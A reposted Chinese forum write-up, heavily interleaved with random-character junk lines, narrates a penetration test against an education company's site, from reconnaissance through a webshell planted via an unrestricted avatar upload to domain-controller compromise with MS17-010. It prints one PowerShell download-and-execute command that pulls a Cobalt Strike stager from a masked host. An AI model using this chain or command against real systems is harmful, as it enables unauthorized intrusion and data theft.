2 m2 T# [3 A! k/ x+ w7 |8 c 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
# m/ A- K2 V% }: Z2 N 8 Y b8 D0 c* y. Q+ E, p8 l
% ^8 O3 q1 V& e7 |7 N
# [- z6 X( H( f
' e3 G; R8 r, l8 i) _/ \& a( h0 i9 a+ Y$ c3 |
正文
# W$ ] p- V( I, p" M( v 0 C2 a" g* y2 s" K& \
7 D$ i. L0 C* W. A% Y9 v
& _1 H3 V H4 R( B
c# I$ r" w5 B
8 h: ^9 z) i1 u1 p; I1 w0 b 目标:www.xxxx.com(一家教育机构)
, h3 O4 V) K1 z( W1 d/ B/ t3 A1 |' F打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
: G$ f: w( u0 f; T, } % s. I. w3 P% G! E
! H8 H5 L- }0 @2 d
- l% H$ t- P1 m, v' S- @" t, J + W6 o2 r9 M. B2 F2 K0 G0 ~/ a* O
' v: f `7 f+ K
进行了简单的信息搜集
* s5 c" N8 X% M1 y+ D * i% E' s6 e9 G4 p: I8 X [* N
; f# r- M* w% j# k& [4 g/ y) N) n
/ O, I4 ~; [$ ^/ W4 z( }: Z) @
P* ?8 o. i. w+ V 子域名搜集 v+ h( X t: P8 \
- _2 G" g' ]& {, i& I3 P: t( W2 k' n6 S3 H7 C2 L9 d8 ^
! i- ^4 [' u) i; o3 D4 T& X, c( j
; Z w2 f5 ^0 N! {$ W$ v
; S; L& P2 J! e3 L: A; O" s fofa找资产 - e. i& ~4 q z6 p- u; V
4 h2 [0 t) d1 E9 k$ |5 g
5 Z+ u0 Z+ s {
) I( Z, d* f S! s/ o& B4 ]" F% v+ t x5 q
5 O I& L f* F( M( ]' T# ~
+ [, ], A% w; s( E$ [1 c! q; I
8 n& O$ r5 }6 I, d- l( Z* `9 l 一共七个资产。去重之后只有两个。 - ~% P$ ?/ _+ [: t
0 W, F3 ^% z4 @6 a A0 R
5 k( f$ g- m) q& D. Q$ b
, f v6 V+ @/ C* j) D1 w5 u v( E* P. |2 U* r# m
目录探测
9 C% ^) ?# J% k 8 J' i' Q8 R5 _" u7 B4 }
4 k+ S0 y+ ]# B0 | ( ~0 a# |$ d8 z i8 \" [
* Z: z3 J( x3 f6 H/ K V8 F2 O3 |, J+ g& q& i& L
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 ) K7 S% f, f0 s+ X. i! a8 W
" [( r$ I4 w- N# e T) U5 L0 M
$ t e% u( F6 V7 E1 s6 N
* t0 r( m4 q5 P8 ~$ ]
s5 `) N* G, D% m% r u( j 我又尝试了通过修改返回包来绕过登录界面
% A, e# C- x, K9 R7 `$ k" L
. ]0 ~, a; H. s6 L! G+ j( E% o. H g; l" T7 A
/ c' T B! j& q' J/ j 3 j1 U& H% h t% Y! [/ G9 {+ v
* f. L$ C3 I2 T6 O, o
还是不行,尝试注入无果+ x) O1 z9 q- q/ C
1 Q; I) A( z4 ^' {9 v3 O% r) _& }- M. B5 {( |) _( z$ t3 L
* I7 A0 a( Z" V9 |# l 8 S7 j v- o7 `0 l7 j9 ~( y9 ?
# ] A8 {. R5 g
不过我目录探测出了一处Spring信息泄露
0 g' b/ A" V; `2 B4 l3 p
9 k/ {( {& M6 P( _) C3 P# M" g' S
/ g, w$ U. n9 V' s2 r6 ~ ' c+ S$ D# u$ q/ @* e+ p" U0 L9 z
# w* H- C) l" N
! P+ ]: \+ j z5 F0 s: u7 ~7 V: [+ T
2 ^2 {* ?' P- n; R$ K
0 x" P; K- v9 g: j 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录5 l* M& k; O0 `, E
$ M" t; J8 L2 ]) R% t3 l$ X
+ }& _; u# w4 R! G6 o" V/ `
% r% L; }/ J1 Q7 N+ q S# R1 m
9 w- W1 C0 t7 t, k
* E5 T5 J1 B8 Y
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 ~! B( i4 O" s7 g
2 x+ [) g/ ?6 Y
$ y! x# z) D! l# W: ~# ]" J
# B0 X5 b- R8 V$ C
/ `. u4 ~2 A4 _# o7 e6 ]% \! o2 }6 A2 c
获取有些师傅到这一步就手机抓包电脑测了。. E8 t; `% m9 I/ z& }
5 f- x, x2 c1 Y1 B2 }
) m; l! v9 K0 W6 k Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。( A9 w7 S1 ?1 x8 A
2 S+ \5 `4 Z7 T9 \0 h
! T$ p, o8 I) y 其中在一个公众号发现了小程序,可以进行注册。
5 T3 B4 c/ f( P- O
$ O d" M, G9 r: d" w% X7 P. I8 W" J4 m/ e3 d- f( b
看到了头像上传,尝试上传获取WebShell3 x- s; P/ f* v/ {1 {, W; [1 [4 q5 g& A
# @" ^+ r, |- Q/ P3 R- S6 W) a2 `' T. `4 [
9 g! M& _3 T) n* I8 c9 }% t# S
# @6 u8 a6 d/ p' r) M% x b" r2 c5 H4 J
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
* \' f- n" {3 j% x$ C+ r6 X % W; o7 m* P$ E9 M
, A8 {' V' F: G3 E) O , A# G9 f% j2 K4 V+ ~. t
2 ?9 t8 H* \% K! f4 [8 O% u% v6 ?
* v9 Q0 C; `) ^- G/ }3 W
然后上了大马# Z! k6 P5 [ q y0 f* [
$ L0 L8 b: |" @ H% }$ t
- X, ~* f( N6 n3 y) O. F. y. c
1 X2 h( }2 q+ \3 L# z) j
: L; f& @3 {' V n2 L8 i
& r' i5 j: S9 U% }) t+ F# v
+ d) l2 n+ e8 y2 c& H
4 u7 e) |: J- v
9 ~9 T. a/ N4 t3 y G0 g3 z2 d 通过翻找文件发现数据库账号密码$ S. m9 D( t% H$ Z& `7 P
2 x0 h' p1 a, e V$ s9 h; z* {+ f5 ~' \. X( A, J; d9 v
8 [: M/ P: ?, \
0 j3 `; B! J. ^1 {. }" o4 ]( s2 s3 }6 h9 M2 v
--内网渗透
) s$ m+ r; c$ R
3 n4 p E' \6 Z) {9 u* L/ ]( e9 m) f1 O. Y+ b- ]; T; \8 k0 u* Q
直接通过powershell执行 cs上线. ~, g! m5 @5 r0 I: s( D
9 [' B! D" U1 U( H9 m6 g- c' L; k7 @- w/ a' X
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
; w; T5 v8 i! r : u& S) D K5 q9 O; |+ p- D
+ H2 s( C" E4 i- U) K) s( Z7 Y
! k7 f+ B5 K3 H; b# Q + _* B8 _4 h6 `
2 d' ^0 J5 i/ u$ f- T* P& C
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
# |0 ^" C+ y* i# [: G
% ~1 U' t# n3 j; E$ e' _; N# s
3 q, ~, i- p0 K7 Z6 G' S
! ?- L5 |+ k' e" p5 P* ^/ D + e9 M# R- R4 `& @- e0 E7 I: i
9 _- G+ W8 W1 x1 h
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 2 B E, N& \5 G5 w' Q- ` q
& R0 b1 q4 P- Q# a: e. k5 p2 J) _ 8 Z0 G( Q) Y7 d7 l1 D+ f, t
. f" {1 l9 _$ x( F) H& a$ C
' `( s9 u5 O" T5 i. o
+ j: k2 }. c+ P, L6 m 2 @# m4 |7 \1 T! a) k
/ _: O0 x6 P7 j( i
# c/ C: Y- c3 n1 i6 E+ x
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
. y# j1 y4 @/ a# ^& S' o& e: b9 D5 @& N2 z 7 n. l3 m1 Y$ _* p
$ E: M1 I; R& I$ w; S; K/ ~' K * R+ u) X1 k- J0 ?
w9 m# y3 [+ ]6 A% u K9 W 0 }/ `1 C& @: n$ o; ~ }
6 P# N* L5 Q* q' d9 U
) G, c c4 z4 @ - W3 J1 R2 H( A
5 P6 i8 j F$ W1 c, m8 p6 @9 R. g9 ^4 E3 q% s3 h
8 k' Y5 @& |& N x& m0 J% C
; \ c/ K) g0 s' x* {; W+ l
8 H( Q& |) M+ \% ]! Y; b
6 e8 o3 d& Q' y5 I9 o
5 Q. @& o8 o! Z- r3 @ 小结
* M' ^2 u/ c+ n! q . G& y Y! m' v b' s+ e; B# U5 i
6 ?" p6 s- K" [0 _4 R" `
; D# ^/ i7 \2 C
# o" \' [+ q/ _" t2 D5 q: X$ M
8 T+ R( o; A) {8 G1 {9 @* w) c 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!3 e( l9 @9 N% l% O0 c$ c
2 H, e& z$ G2 F4 ^
% U6 X) ^. p* z2 J6 ` 3 `6 ^- c7 h N. p, a
3 I+ E7 [: `4 }+ _8 Q
% ^% H s; i# n0 A - 5 i' K) [, _& a4 D" D7 J
( M3 `) ?# @1 e5 D
, E5 ^ ^( W$ A& I0 K
- ) [4 D; b& |# M0 m0 a
3 o8 y$ m C. J; y. i8 `( L
( j, o# W2 m/ Q$ l$ d o& T
3 s: P2 v w3 N u2 m/ h( d0 s, ]
- V& h1 o& w1 w 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
! _$ d- {' M4 Y. m/ f# _ . a V/ s5 ^- p0 |
# c! J/ ]: G( S/ l
8 ~6 M9 \8 R, j/ t h, S5 ? |